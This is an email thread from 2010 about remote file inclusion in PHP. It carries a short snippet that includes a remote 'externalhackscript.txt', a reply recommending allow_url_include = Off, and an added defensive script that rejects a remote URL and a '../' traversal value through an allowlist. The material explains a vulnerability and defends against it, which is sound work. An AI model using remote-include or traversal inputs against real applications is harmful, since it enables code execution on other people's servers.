Hey Richard,

I'll find out more about this parameter allow_url_include, thank you!

Regards,
Igor Escobar
Systems Analyst & Interface Designer

+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)

On Mon, Jun 7, 2010 at 5:26 PM, richard gray <rich@xxxxxxxxxxxx> wrote:

> On 07/06/2010 20:00, Igor Escobar wrote:
>
>> PHP Injection is the technical name given to a security hole in PHP
>> applications. When this gap exists, a hacker can supply external code
>> that is interpreted as internal code, as if the included code were just
>> another part of the script.
>>
>> // my code...
>> // my code...
>> include ('http://..../externalhackscript.txt');
>> //my code...
>> //my code..
>>
> Can you not switch off remote file includes in php.ini?
> This will stop include/require from a remote host,
> i.e. allow_url_include = Off in php.ini
>
> HTH
> Rich
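
A runtime check for the allow_url_include setting mentioned in the reply, combined with an allowlist for the include target, as an added example that is not part of the original thread. The function names, page names and temporary directory are hypothetical, and the script is meant to be run with the PHP CLI.

```php
<?php
// Added example: helper names and demo data are hypothetical; only
// allow_url_include and include/require come from the thread.

/** True when a boolean php.ini directive is enabled at runtime. */
function ini_flag_enabled(string $name): bool
{
    $value = ini_get($name);               // false if the directive is unknown
    return $value !== false && filter_var($value, FILTER_VALIDATE_BOOLEAN);
}

/** Map a requested page name to a file inside $baseDir, or throw. */
function resolve_include(string $page, string $baseDir, array $allowed): string
{
    if (!in_array($page, $allowed, true)) {
        throw new InvalidArgumentException("page not allowed: $page");
    }
    // Defence in depth: the resolved file must exist under the include directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("no such file under include directory: $page");
    }
    return $path;
}

// Refuse to run at all if remote includes are enabled.
if (ini_flag_enabled('allow_url_include')) {
    error_log('allow_url_include is On; set allow_url_include = Off in php.ini');
    exit(1);
}

// Constructed demo data: one page file in a temporary directory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', '<?php echo "home page\n";');

// Constructed request values, including a remote URL like the one in the thread.
foreach (['home', 'http://example.invalid/script.txt', '../home'] as $requested) {
    try {
        include resolve_include($requested, $dir, ['home', 'about']);
    } catch (Exception $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}

unlink($dir . DIRECTORY_SEPARATOR . 'home.php');
rmdir($dir);
```

The first request includes the local file; the URL and the `../` value are rejected before `include` is ever reached, so the script does not depend on php.ini alone.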